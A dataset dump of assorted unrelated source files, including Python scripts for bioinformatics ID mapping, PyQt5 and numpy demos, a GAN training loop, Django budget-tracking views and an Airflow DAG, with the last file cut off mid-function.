index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
994,900 | e4b6b219c8d3d0d454dc0bb3e30d1ee3ecb7b0f5 | #!/usr/bin/env python3
"""
Usage: python day2-lunch-2.py fly_mapping.txt ~/data/results/stringtie/SRR072893/t_data.ctab ignore
"""
# Import libraries
import sys
# Open files
mapping = open(sys.argv[1], "r")
c_tab = open(sys.argv[2], "r")
output = open("id_mapping_ignore.txt", "w")
# Read in third argument
translation_arg = sys.argv[3]
# Use the same header for the output file as from the original c_tab file
output.write(c_tab.readline())
# Create a dictionary from the mapping file
fly_mapping = dict()
for line in mapping:
split_line = line.split()
fly_mapping[split_line[0]] = split_line[1]
# Limiting output to 100 lines
counter = 0
# Iterate through c_tab file
for data in c_tab:
if (counter == 100):
break
c_tab_id = data.split()[8]
# If FlyBase ID has a corresponding UniProt ID, replace the Flybase ID with the UniProt translation
if c_tab_id in fly_mapping:
new_data = data.split()
new_data[8] = fly_mapping[c_tab_id]
output.write("\t".join(new_data) + "\n")
counter += 1
# If no mapping exists, either replace the FlyBase ID with a default value or ignore that specific line
else:
# Ignore line
if (translation_arg == "ignore"):
continue
# Replace FlyBase ID with .
else:
new_data = data.split()
new_data[8] = "."
output.write("\t".join(new_data) + "\n")
counter += 1
# Close files
mapping.close()
c_tab.close()
output.close()
|
994,901 | f510bf1efbd1a53e79c34d35744a92b2c0bd6629 | """
@Time : 2021/5/16 11:30
@Author : ZHC
@FileName: numpy_demo.py
@Software: PyCharm
"""
import numpy as np
a = np.arange(9).reshape(3, 3)
print(a)
print()
b = 2 * a
print(b)
print("水平组合 ",np.hstack((a,b)))
print()
print("用concatenate函数来实现同样",np.concatenate((a,b),axis=1)) |
994,902 | 4b89b05a60ff637a0de46b05c7567f86d4c24c49 | class Symbol(object):
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
def __repr__(self):
return "Symbol(%r)" % self.name
def isSymbol(v):
return isinstance(v, Symbol)
def symbol(name, syms={}):
s = syms.get(name)
if s is None:
s = Symbol(name)
syms[name] = s
return s
class Unique(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<unique: %s>" % self.name
def isUnique(v):
return isinstance(v, Unique)
null = Unique("()")
true = Unique("true")
false = Unique("false")
def make_tuple(length):
if length == 0:
return null
return [null]*length
def isTuple(v):
return isinstance(v, list)
def tuple_length(a):
return len(a)
def tuple_get(a, i):
return a[i]
def tuple_set(a, i, v):
a[i] = v
def tuple_(*args): # shortcut for use in interpreter
return list(args)
def make_typed(t, v):
return tuple_(t, v)
def isType(t, v):
if isTuple(v):
return t == typed_tag(v)
return False
def typed_tag(t):
return tuple_get(t, 0)
def typed_value(t):
return tuple_get(t, 1)
pairTag = Unique("pair")
def pair(x, y):
return make_typed(pairTag, tuple_(x, y))
def isPair(v):
return isType(pairTag, v)
def pair_head(p):
return tuple_get(typed_value(p), 0)
def pair_tail(p):
return tuple_get(typed_value(p), 1)
appTag = Unique("app")
def app(f, x):
return make_typed(appTag, tuple_(f, x))
def isApp(v):
return isType(appTag, v)
def app_proc(a):
return tuple_get(a, 0)
def app_arg(a):
return tuple_get(a, 1)
primTag = Unique("prim")
def makePrim(p):
return make_typed(primTag, p)
def isPrim(v):
return isType(primTag, v)
macroTag = Unique("macro")
def makeMacro(m):
return make_typed(macroTag, m)
def isMacro(v):
return isType(macroTag, v)
|
994,903 | d917546acc4b4729634e50b3fda27825048466aa | # Face Recognition learnt form indian
# 2017-04-02 19:20:31
import cv2
import numpy as np
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0)
# using your own camera
userId = input('Please enter the user id: ')
sampleNum = 0
while True:
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray)
for (x, y, w, h) in faces:
cv2.imwrite('dataSet/User.' + str(userId) + '.' + str(sampleNum) + '.jpg',\
gray[y:y+h, x:x+w])
cv2.rectangle(img, (x,y), (x+w, y+h), (0, 255, 0), 2)
cv2.waitKey(100)
sampleNum += 1
cv2.imshow('iamge', img)
k = cv2.waitKey(30) & 0xff
if sampleNum > 20:
break
cap.release()
cv2.destroyAllWindows()
|
994,904 | eedf55bbaad7883952c64d1da9a814d467eebaa4 | #
# @lc app=leetcode id=520 lang=python3
#
# [520] Detect Capital
#
class Solution:
def exceptUpper(self, word: str)->bool:
if len(word) == 0:
return True
if word[0].islower():
return False
return self.exceptUpper(word[1:])
def exceptLower(self, word: str)->bool:
if len(word) == 0:
return True
if word[0].isupper():
return False
return self.exceptLower(word[1:])
def detectCapitalUse(self, word: str) -> bool:
if word[0].isupper():
return self.exceptUpper(word[1:]) or self.exceptLower(word[1:])
else:
return self.exceptLower(word[1:])
|
994,905 | 3ce01a7ae33836d4de4e651dc9c6de037f304d0d | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
ZetCode PyQt5 tutorial
In this example, we create a simple
window in PyQt5.
author: Jan Bodnar
website: zetcode.com
last edited: January 2015
"""
import sys
from PyQt5.QtWidgets import (QWidget, QToolTip, QPushButton, QApplication, QMessageBox, QDesktopWidget)
from PyQt5.QtGui import QIcon # For the icon
from PyQt5.QtGui import QFont # For the tooltip font
from PyQt5.QtCore import QCoreApplication # For quit button
class Example(QWidget): #The Example class inherits from the QWidget class.
def __init__(self):
super().__init__() #The __init__() method is a constructor method in Python language.
self.initUI()
def initUI(self):
#Create a tooltip
QToolTip.setFont(QFont('SansSerif', 10))
self.setToolTip('This is a <b>QWidget</b> widget')
btn = QPushButton('Button', self)
btn.setToolTip('This is a <b>QPushButton</b> widget')
btn.resize(btn.sizeHint())
btn.move(50, 50)
qbtn = QPushButton('Quit', self) #The first parameter of the constructor is the label of the button. The second parameter is the parent widget.
qbtn.clicked.connect(QCoreApplication.instance().quit) #The event processing system in PyQt5 is built with the signal & slot mechanism. If we click on the button, the signal clicked is emitted. The slot can be a Qt slot or any Python callable. The QCoreApplication contains the main event loop; it processes and dispatches all events. The instance() method gives us its current instance. Note that QCoreApplication is created with the QApplication. The clicked signal is connected to the quit() method which terminates the application. The communication is done between two objects: the sender and the receiver. The sender is the push button, the receiver is the application object.
qbtn.resize(qbtn.sizeHint())
qbtn.move(200, 50)
self.resize(500, 500)
self.center()
self.setWindowTitle('Tooltips')
self.show()
def center(self):
qr = self.frameGeometry() # We get a rectangle specifying the geometry of the main window.
cp = QDesktopWidget().availableGeometry().center() #We figure out the screen resolution of our monitor. And from this resolution, we get the center point.
qr.moveCenter(cp) #Our rectangle has already its width and height. Now we set the center of the rectangle to the center of the screen. The rectangle's size is unchanged.
self.move(qr.topLeft()) #We move the top-left point of the application window to the top-left point of the qr rectangle, thus centering the window on our screen.
# Change the closeEvent Function to implement a QMessageBox
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message',
"Are you sure to quit?", QMessageBox.Yes | QMessageBox.No , QMessageBox.Yes)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_()) #The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead. |
994,906 | e667226f2272727862799c5fa382ec31ea70700b | # staff
from staff_models.staffs.class_admins.staff_admin import StaffAdmin
# staff phone
from staff_models.staffs.class_admins.staff_phone_admin import *
# staff address
from staff_models.staffs.class_admins.staff_address_admin import *
|
994,907 | 4b7c0cfa3a96eec448f0f89fbd6ede1f5381ce33 | #função calcula velocidade media
def calcula_velocidade_media(km,h):
v = km/h
return v
vm = calcula_velocidade_media(12,5)
print(vm) |
994,908 | 38a51b0e0c92c27bb3926320f625b2cabae5940d | from django import forms
class LoginForm(forms.Form):
username = forms.CharField(max_length=32)
password = forms.CharField(widget=forms.PasswordInput)
class NewblogpostsForm(forms.Form):
title = forms.CharField(max_length=50)
body = forms.CharField(widget=forms.Textarea, required=False)
class CommentForm(forms.Form):
name = forms.CharField(max_length=32)
comment = forms.CharField(widget=forms.Textarea(attrs={'cols': 30, 'rows': 4}))
|
994,909 | 47c9a6748420de8ff04908c36c53e02ac18d20d1 | '''
Init
'''
from .package_name import var
|
994,910 | 2e1a979afdd3d99f064d91c2445b8385c5336462 | import sys
import os
from adv.fgsm import FGSM
from adv.jsma import JSMA
from utils import load_data_for_adv, load_pretrain_model, evl_index_for_adv
from config import *
map_attackers = {
'fgsm': FGSM,
'jsma': JSMA,
}
def adv_attack(model, data_loader, max_bit, alg):
attacker = map_attackers[alg](model, max_bit)
iter = 0
r_codes = []
for x, y in data_loader:
if y.item() == 1:
r_code, adv_x = attacker.attack(x, y)
r_codes.append(r_code)
iter += 1
# if iter > 5:
# break
evl_index_for_adv(r_codes, alg)
return r_codes
def worker(args):
alg, max_bit, model_file = args
model = load_pretrain_model(model_file)
data_loader = load_data_for_adv(os.path.join(data_dir, 'baseline_dataset.pkl'))
print("=============attack algorithm:{} max_bit:{} ======START=========".format(alg, max_bit))
r_codes = adv_attack(model, data_loader, max_bit, alg)
report = {
'alg': alg,
'max_bit': max_bit,
'model_file': model_file,
'r_codes': r_codes,
}
print("=============attack algorithm:{} max_bit:{} ======END=========".format(alg, max_bit))
return report
if __name__ == '__main__':
commands = []
target_models = list(map(lambda x: os.path.join(model_save_dir, x), os.listdir(model_save_dir)))
print(target_models)
for target_model_file in target_models:
for max_bit in [10,20,30,40]:
commands.append(('fgsm', max_bit, target_model_file))
commands.append(('jsma', max_bit, target_model_file))
print(commands)
print(len(commands))
import multiprocessing as mp
pool = mp.Pool(processes=6)
rets = pool.map(worker, commands)
# import json
# with open('attack.logger.json', 'w') as f:
# json.dump(rets, f, indent=4)
|
994,911 | 134942fb800169515e9cc0b73c464a1bf6d32703 | # Generated by Django 3.1 on 2020-10-17 13:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('school', '0017_auto_20201002_1752'),
]
operations = [
migrations.CreateModel(
name='Enroll',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=64, verbose_name='姓名')),
('phone', models.CharField(max_length=20, verbose_name='手机号')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('course', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='school.course', verbose_name='课程')),
('school', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='school.school', verbose_name='学校')),
],
),
]
|
994,912 | 4b46a45a58755323a763a3032907c904613d019d | '''Given the names and grades for each
and print the name(s) of any student(s)
Note: If there are multiple students with the same grade, order their names alphabetically and print each
name on a new line.
Input Format
The first line contains an integer,
The subsequent lines describe
the second line contains their grade.
Constraints
There will always be one or more
Output Format
Print the name(s) of any student(s) having the second lowest grade in Physics; if there are multiple
students, order their names alphabetically
'''
while(True):
try:
no_of_student=int(input("Enter the number of student: "))
break
except:
print("Please give a integer value")
continue
student_score=[]
dummy_score=list()
for _ in range(no_of_student):
print()
name = input("Enter the name of the student: ")
while(True):
try:
score= float(input("Enter the score of the student: "))
break
except:
print("please enter a numerical value")
print("Re-enter the student details")
continue
student_score.append([name,score])
orderedlist = sorted(student_score, key=lambda x:x[0])
print()
print("The order of the student according to name is :")
[print(_) for _ in orderedlist]
orderedscore = sorted(student_score, key=lambda x:x[1])
list=[]
for _ in orderedscore:
if _[1] in list:
continue
list.append(_[1])
try:
second_least_number = list[1]
except:
print("Every one has scored same grade")
second_least_number=list[0]
print()
print("Second lowest grade student are: ")
for _ in orderedlist:
if second_least_number in _:
print(_)
|
994,913 | 374f168a0ea7c7c03c06014b7ef00a6ce8cf2779 | # Generated by Django 3.0.3 on 2020-02-15 15:36
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('stock', '0002_auto_20200215_1038'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='created_by',
new_name='user',
),
]
|
994,914 | a2e95c979db988f6119a81c45047d1d3574fb73c | import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta
default_args = {
'retries': 1,
'retry_delay': timedelta(minutes=5),
'start_date': airflow.utils.dates.days_ago(0)
}
dag = DAG(
'hello-world-cloud-build-test-demo-2',
default_args=default_args,
description='git-sync testing',
schedule_interval=timedelta(minutes=5))
t1 = BashOperator(
task_id='echo', bash_command='echo welcome!', dag=dag, depends_on_past=False)
|
994,915 | c21704be89cd302f26d4e2960ae9b0e0a09597b7 | """author: @pythonpips"""
name = 'PythonPips'
name.endswith('Pips')
# outputs True |
994,916 | 3a66fa263660e14e51b9d1779f7c88536be6afe9 | import pandas as pd
import requests
import time
import urllib
from bs4 import BeautifulSoup
class AppURLopener(urllib.request.FancyURLopener):
version = "Mozilla/5.0"
data = pd.read_excel("C:\\Users\AMasanov\\Desktop\\app_20191219_112501_659194930_2751059812.xlsx", header=None, sep=';', names=['app', 'pot','uq'], encoding="ISO-8859-1")
links = data['app'].values.tolist()
links = links[1:]
sort_links = []
for lin in links:
if "Android" in str(lin):
print(lin)
word = lin.replace("(", "").replace(")", "")
temp = word.index(str('Android'))
wordEndIndex = temp + word[temp:].index(' ') - 1
sort_links.append(str('/store/apps/details?id=') +str(word[wordEndIndex + 1:].replace(" ","")))
else:
print(str('No Android in ') + str(lin))
print(len(sort_links))
table = pd.DataFrame({'Ссылка': sort_links},
columns=["Ссылка"])
table.to_csv(str("C:\\Users\AMasanov\\Desktop\\") + '/' + str("Ссылки_андроид") + '.csv', sep=';', index=False,
encoding='utf-8-sig')
|
994,917 | 78224bd687949145653b9e04371c473bb04aa4e2 | #!/usr/bin/env python3
# @File: person.py
# --coding:utf-8--
# @Author:Schopenhauerzhang@icloud.com(Schopenhauerzhang@gmail.com)
# @license:Copyright Schopenhauerzhang@icloud.com All rights Reserved.
# @Time: 2019-09-23 15:00
from google.protobuf import json_format
from py_protobuf.protobuf import person_pb2
import json
def get_protobuf_data():
"""
生成protobuf data
Returns:
bytes-like object
"""
try:
person = person_pb2.Person()
person.id = 123
person.name = "abc"
p_res = person.SerializeToString()
except Exception:
raise Exception("get_protobuf_data error: fail, please check your code")
return p_res
def protobuf2json_or_dict(is_json = True):
"""
将protobuf data转为json
Args:
is_json: bool ,True Returns json / False Returns dict
Returns:
dict/json string
"""
try:
persons = person_pb2.Person()
persons.ParseFromString(get_protobuf_data())
if is_json is True:
result = json_format.MessageToJson(persons)
result = json.loads(result)
else:
result = json_format.MessageToJson(persons)
except Exception:
raise Exception("protobuf2json_or_dict error: fail, please check your code")
return result
|
994,918 | b509695e7c23bb35fb853080bf47e89c6668b76c |
from common.gps import gps_dist_matrix
print(gps_dist_matrix([[1,2], [3,4], [5,6]]))
|
994,919 | dede78ed01d5fc42783f4990fc1128a7c4de2099 | #!/usr/bin/env python3
"""Ouput the two DNA sequences with the highest number of matches, with their
number of matches, from a csv."""
__appname__ = "align_seqs.py"
__author__ = "Katie Bickerton <k.bickerton18@imperial.ac.uk>"
__version__ = "3.5.2"
__date__ = "14-Oct-2018"
import sys
#import csv module to allow csv files to be read/written
import csv
#reads csv
with open('../Data/seqs.csv','r') as f:
csvread = csv.reader(f)
# create a list of sequences
sourcedata = [x[0] for x in csvread]
#set the two sequences required
seq1 = sourcedata[0]
seq2 = sourcedata[1]
# # Two example sequences to match
## If inputting sequences manually:
#seq2 = "ATCGCCGGATTACGGG"
#seq1 = "CAATTCGGAT"
# Assign the longer sequence s1, and the shorter to s2
# l1 is length of the longest, l2 that of the shortest
# calculates length of both sequences
l1 = len(seq1)
l2 = len(seq2)
# finds the longer sequence and assigns to s1
if l1 >= l2:
s1 = seq1
s2 = seq2
else:
s1 = seq2
s2 = seq1
l1, l2 = l2, l1 # swap the two lengths
# A function that computes a score by returning the number of matches starting
# from arbitrary startpoint (chosen by user)
def calculate_score(s1, s2, l1, l2, startpoint):
"""Computes number of matches and returns score based on matches."""
matched = "" # to hold string displaying alignements
score = 0
for i in range(l2):
#moves shorter sequence along longer, counting number of matches in
#each position
if (i + startpoint) < l1:
if s1[i + startpoint] == s2[i]: # if the bases match
matched = matched + "*"
score = score + 1
else:
matched = matched + "-"
# gives an output for each startpoint showing the number of matches where
# * is a match and - is no match, position of the two sequences relative to
# each other, and the number of matches for that startpoint.
print("." * startpoint + matched)
print("." * startpoint + s2)
print(s1)
print(score)
print(" ")
return score
# Test the function with some example starting points:
# calculate_score(s1, s2, l1, l2, 0)
# calculate_score(s1, s2, l1, l2, 1)
# calculate_score(s1, s2, l1, l2, 5)
# now try to find the best match (highest score) for the two sequences
# setting start values:
my_best_align = None
my_best_score = -1
for i in range(l1): # Note that you just take the last alignment with the highest score
z = calculate_score(s1, s2, l1, l2, i)
if z > my_best_score:
# best align is position of starting point of s2 relative to s1, with the most matches
my_best_align = "." * i + s2
my_best_score = z
print(my_best_align)
print(s1)
print("Best score:", my_best_score)
# create an output string of alignment, sequence and best score
outstr = "{}\n{}\nBest score: {}".format(my_best_align, s1, my_best_score)
# write string to text file
with open("../Results/best_score.txt", "w") as f:
f.write(outstr) |
994,920 | 78ec741487c1f204c83599e0a474cacfd70af152 | import torch
import argparse
# import yaml
# import yaml_utils
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
from torchvision import datasets, transforms,utils
from torch.utils.data import DataLoader
from gen_models_pytorch.gen_res_32 import Generator32
from dis_models_pytorch.dis_res_32 import Discriminator32
import torchvision
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--lr', type=float, default=1e-5)
parser.add_argument('--loss', type=str, default='hinge')
parser.add_argument('--checkpoint_dir', type=str, default='checkpoints')
parser.add_argument('--model', type=str, default='resnet')
parser.add_argument('--path', type=str, default=r"H:\Dataset") #flower_path = r'H:\Dataset\flowers17\train'
# parser.add_argument('--batch', type=int, default=8)
parser.add_argument('--iter', type=int, default=200000)
parser.add_argument('--n_class', type=int, default=10)
args = parser.parse_args()
dataset = iter(sample_data(args.path, args.batch_size))
Z_dim = 128
# number of updates to discriminator for every update to generator
disc_iters = 3
discriminator = Discriminator32(n_class=args.n_class).to(device)
generator = Generator32(Z_dim,n_class=args.n_class).to(device)
# because the spectral normalization module creates parameters that don't require gradients (u and v), we don't want to
# optimize these using sgd. We only let the optimizer operate on parameters that _do_ require gradients
# TODO: replace Parameters with buffers, which aren't returned from .parameters() method.
optim_disc = optim.Adam(discriminator.parameters(), lr=args.lr, betas=(0.0, 0.9))
optim_gen = optim.Adam(generator.parameters(), lr=6*args.lr, betas=(0.0, 0.9))
# use an exponentially decaying learning rate
scheduler_d = optim.lr_scheduler.ExponentialLR(optim_disc, gamma=0.90)
scheduler_g = optim.lr_scheduler.ExponentialLR(optim_gen, gamma=0.90)
pbar = tqdm(range(args.iter), dynamic_ncols=True)
for i in pbar:
discriminator.zero_grad()
# real_image, label = next(dataset)
# b_size = real_image.size(0)
# real_image = real_image.to(device)
# label = label.to(device)
# update discriminator
requires_grad(generator, False)
requires_grad(discriminator, True)
b_size = 0
for _ in range(disc_iters):
real_image, label = next(dataset)
real_image = real_image.repeat(1, 3, 1, 1)
real_image = real_image.to(device)
b_size = real_image.size(0)
z = torch.randn(b_size, Z_dim).to(device)
label = label.to(device)
optim_disc.zero_grad()
optim_gen.zero_grad()
# loss1 = -discriminator(real_image,label).mean()
# loss2 = discriminator(generator(z,label),label).mean()
disc_loss = -discriminator(real_image,label).mean() + discriminator(generator(z,label),label).mean()
# if args.loss == 'hinge':
# disc_loss = nn.ReLU()(1.0 - discriminator(data)).mean() + nn.ReLU()(1.0 + discriminator(generator(z))).mean()
# elif args.loss == 'wasserstein':
# disc_loss = -discriminator(data).mean() + discriminator(generator(z)).mean()
# else:
# disc_loss = nn.BCEWithLogitsLoss()(discriminator(data), Variable(torch.ones(args.batch_size, 1).cuda())) + \
# nn.BCEWithLogitsLoss()(discriminator(generator(z)), Variable(torch.zeros(args.batch_size, 1).cuda()))
disc_loss.backward()
optim_disc.step()
# optim_disc.zero_grad()
optim_gen.zero_grad()
requires_grad(generator, True)
requires_grad(discriminator,False )
z = torch.randn(b_size, Z_dim).to(device)
gen_loss = -discriminator(generator(z,label),label).mean()
gen_loss.backward()
optim_gen.step()
if i%5000 == 0:
scheduler_d.step()
scheduler_g.step()
if (i + 1) % 100 == 0:
generator.train(False)
z = torch.randn(args.n_class, Z_dim).to(device)
input_class = torch.arange(args.n_class).long().to(device)
fake_image = generator(z, input_class)
generator.train(True)
utils.save_image(
fake_image.cpu().data,
f'sample/{str(i + 1).zfill(7)}.png',
nrow=args.n_class,
normalize=True,
range=(0, 1),
)
if (i + 1) % 2000 == 0:
no = str(i + 1).zfill(7)
torch.save(generator.state_dict(), f'checkpoint/generator_{no}.pt')
torch.save(discriminator.state_dict(), f'checkpoint/discriminator_{no}.pt')
torch.save(optim_gen.state_dict(), f'checkpoint/gen_optimizer_{no}.pt')
torch.save(optim_disc.state_dict(), f'checkpoint/dis_optimizer_{no}.pt')
pbar.set_description(
(f'{i + 1}; G: {gen_loss:.5f};' f' D: {disc_loss:.5f}')
)
def sample_data(path, batch_size):
# dataset = datasets.ImageFolder(path, transform=transform)
# dataset = torchvision.datasets.STL10(path,transform=transform)
dataset = torchvision.datasets.FashionMNIST(path,transform=transform)
loader = DataLoader(dataset, shuffle=True, batch_size=batch_size, num_workers=4)
loader = iter(loader)
while True:
try:
yield next(loader)
except StopIteration:
loader = DataLoader(
dataset, shuffle=True, batch_size=batch_size, num_workers=4
)
loader = iter(loader)
yield next(loader)
transform = transforms.Compose(
[
transforms.Resize((32,32)),
# transforms.CenterCrop(128),
# transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
# transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
)
def requires_grad(model, flag=True):
for p in model.parameters():
p.requires_grad = flag
if __name__ == '__main__':
with torch.cuda.device(0):
main()
|
994,921 | bf6f828027e3dc12bbcd6c3a782fcb9551681930 | from django.shortcuts import render, render_to_response, redirect, RequestContext
import time
from django.db import transaction, connection
from django.http import HttpResponseRedirect, HttpResponse
from django.conf import settings
from django.conf.urls.static import static
from rbmo.models import Agency, WFPData, PerformanceTarget, CoRequest, PerformanceReport
from django.contrib.auth.models import User
from .forms import WFPForm, CORequestForm
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required, permission_required
from helpers.helpers import has_permission, get_allowed_tabs, dictfetchall
from datetime import datetime, date
SYSTEM_NAME = 'e-RBMO Data Management System'
months = ['January', 'February', 'March', 'April',
'May', 'June', 'July', 'August', 'September',
'October', 'November', 'December']
@login_required(login_url='/admin/')
def wfpForm(request):
context = RequestContext(request)
data = {'system_name':SYSTEM_NAME,
'agency_id': request.GET.get('agency_id')
}
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
data['current_year'] = time.strftime('%Y')
data['form'] = WFPForm()
if request.method=='POST':
wfp_form = WFPForm(request.POST)
if wfp_form.is_valid():
saveWFPData(request, wfp_form, request.POST.get('year'), request.POST.get('agency'))
data['s_msg'] = 'WFP Entry was succesfully saved'
data['agency'] = Agency.objects.get(id=request.POST.get('agency'))
return render_to_response('./wfp/wfp_form.html', data, context)
else:
data['frm_errors'] = wfp_form.errors
data['form'] = wfp_form
return render_to_response('./wfp/wfp_form.html', data, context)
else:
try:
data['agency'] = Agency.objects.get(id=data['agency_id'])
return render_to_response('./wfp/wfp_form.html', data, context)
except Agency.DoesNotExist:
return HttpResponseRedirect('/admin/agencies')
@login_required(login_url='/admin/')
@transaction.atomic
def viewWFP(request):
context = RequestContext(request)
cursor = connection.cursor()
data = {'system_name' : SYSTEM_NAME,
'agency_id' : request.GET.get('agency_id'),
'current_year' : time.strftime('%Y'),
'agency_tab' : 'wfp',
'years' : getYears(request.GET.get('agency_id'))
}
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
if request.method=='POST':
year = request.POST.get('year')
agency = Agency.objects.get(id=request.POST.get('agency_id'))
else:
year = time.strftime('%Y')
agency = Agency.objects.get(id=request.GET.get('agency_id'))
data['pss'] = getProgActs('PS', agency, year)
data['mooes'] = getProgActs('MOOE', agency, year)
data['cos'] = getProgActs('CO', agency, year)
data['year'] = year
data['agency'] = agency
return render_to_response('./wfp/agency_wfp_info.html', data, context)
def getYears(agency_id):
cursor = connection.cursor()
query = '''select distinct(year) from wfp_data where agency_id=%s'''
cursor.execute(query, [agency_id])
return dictfetchall(cursor)
def getProgActs(allocation, agency, year):
cursor = connection.cursor()
query = '''
select distinct(program) from wfp_data
where allocation=%s and agency_id=%s and year=%s
'''
cursor.execute(query, [allocation, agency.id, year])
prog_acts = []
maj_prog = cursor.fetchall()
for prog in maj_prog:
acts = []
activities = WFPData.objects.filter(agency=agency, allocation=allocation , year=year, program=prog[0])
for act in activities:
acts.append({'id' : act.id,
'activity' : act.activity
})
prog_acts.append({'prog' : prog[0],
'acts' : acts
})
return prog_acts
@transaction.atomic
def getWFPData(request):
data = {}
context = RequestContext(request)
wfp_id = request.GET.get('wfp_id')
q_targets = []
wfp = WFPData.objects.get(id=wfp_id)
perf_targets = PerformanceTarget.objects.filter(wfp_activity=wfp.id)
for target in perf_targets:
q_targets.append({'id' : target.id,
'indicator': target.indicator,
'q1' : target.jan+target.feb+target.mar,
'q2' : target.apr+target.may+target.jun,
'q3' : target.jul+target.aug+target.sept,
'q4' : target.oct+target.nov+target.dec,
})
data['wfp'] = wfp
data['perf_targets'] = q_targets
return render_to_response('./wfp/wfp_prog_detail.html', data, context)
'''
helper functions
'''
@transaction.atomic
def saveWFPData(request, wfp_form, year, agency_id):
wfp = WFPData(
year = year,
program = wfp_form.cleaned_data['program'],
activity = wfp_form.cleaned_data['activity'],
allocation = request.POST.get('allocation'),
agency = Agency.objects.get(id=agency_id),
jan = wfp_form.cleaned_data['jan'],
feb = wfp_form.cleaned_data['feb'],
mar = wfp_form.cleaned_data['mar'],
apr = wfp_form.cleaned_data['apr'],
may = wfp_form.cleaned_data['may'],
jun = wfp_form.cleaned_data['jun'],
jul = wfp_form.cleaned_data['jul'],
aug = wfp_form.cleaned_data['aug'],
sept = wfp_form.cleaned_data['sept'],
oct = wfp_form.cleaned_data['oct'],
nov = wfp_form.cleaned_data['nov'],
dec = wfp_form.cleaned_data['dec']
)
wfp.total = wfp.jan + wfp.feb + wfp.mar + wfp.apr + wfp.may + wfp.jun + wfp.jul + wfp.aug + wfp.sept + wfp.oct + wfp.nov + wfp.dec
wfp.save()
#save performance indicator
perf_indics = request.POST.getlist('pis[]')
for pi in perf_indics:
pi_info = pi.split(';')
perf_target = PerformanceTarget(wfp_activity=wfp,
indicator=pi_info[0],
jan=pi_info[1],
feb=pi_info[2],
mar=pi_info[3],
apr=pi_info[4],
may=pi_info[5],
jun=pi_info[6],
jul=pi_info[7],
aug=pi_info[8],
sept=pi_info[9],
oct=pi_info[10],
nov=pi_info[11],
dec=pi_info[12]
)
perf_target.save()
@transaction.atomic
def printWFPData(request):
context = RequestContext(request)
agency = Agency.objects.get(id=request.GET.get('agency_id'))
year = request.GET.get('year')
pss = getProgOverview('PS', agency, year)
mooes = getProgOverview('MOOE', agency, year)
cos = getProgOverview('CO', agency, year)
wfp_total = getWFPTotal(agency, year)
data = {'system_name' : SYSTEM_NAME,
'agency' : agency,
'year' : year,
'cur_date' : time.strftime('%B %d, %Y'),
'pss' : pss,
'mooes' : mooes,
'cos' : cos,
'wfp_total' : wfp_total}
return render_to_response('./wfp/wfp_print.html',data, context)
@login_required(login_url='/admin/')
def viewApprovedBudget(request):
context = RequestContext(request)
data = {'system_name' : SYSTEM_NAME}
cursor = connection.cursor()
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
try:
agency = Agency.objects.get(id=request.GET.get('agency_id'))
data['agency'] = agency
return render_to_response('./wfp/approved_budget.html', data, context)
except Agency.DoesNotExist:
return render_to_response('./wfp/approved_budget.html', data, context)
@login_required(login_url='/admin/')
def coRequests(request):
cursor = connection.cursor()
context = RequestContext(request)
data = {'system_name' : SYSTEM_NAME,
'agency_id' : request.GET.get('agency_id')}
try:
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
agency = Agency.objects.get(id=data['agency_id'])
data['agency'] = agency
year = 0
month = 0
co_requests = None
if request.method == 'POST':
year_month = request.POST.get('month').split('-')
year = int(year_month[0])
month = int(year_month[1])
else:
year = int(time.strftime('%Y'))
month = int(time.strftime('%m'))
#get current month and year
co_requests = CoRequest.objects.filter(date_received__year=year, date_received__month=month, agency=agency)
data['co_requests'] = co_requests
data['year'] = year
data['month'] = month
data['month_str'] = months[month-1]
return render_to_response('./wfp/co_request.html', data, context)
except Agency.DoesNotExist:
return HttpResponseRedirect("/admin/agencies")
@login_required(login_url='/admin/')
def coRequestForm(request):
context = RequestContext(request)
data = {'system_name' : SYSTEM_NAME,
'agency_id' : request.GET.get('agency_id'),
'action' : request.GET.get('action')
}
try:
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
agency = Agency.objects.get(id=data['agency_id'])
data['agency'] = agency
if request.method == 'POST':
co_request_form = CORequestForm(request.POST)
action = request.POST.get('form_action', 'add')
if action == 'add' and co_request_form.is_valid():
agency = Agency.objects.get(id=request.POST.get('agency_id'))
date_rcv = request.POST.get('date_received')
addCORequest(co_request_form, agency, date_rcv, request)
data['s_msg'] = 'New request succesfully Saved'
data['form'] = CORequestForm()
return render_to_response('./wfp/co_request_form.html', data, context)
elif action == 'edit' and co_request_form.is_valid():#edit
return HttpResponse('edit')
else:
return HttpResponse(action)
# elif request.GET.get()
else:
data['form_action'] = request.GET.get('form_action', 'add')
data['form'] = CORequestForm()
return render_to_response('./wfp/co_request_form.html', data, context)
except Agency.DoesNotExist:
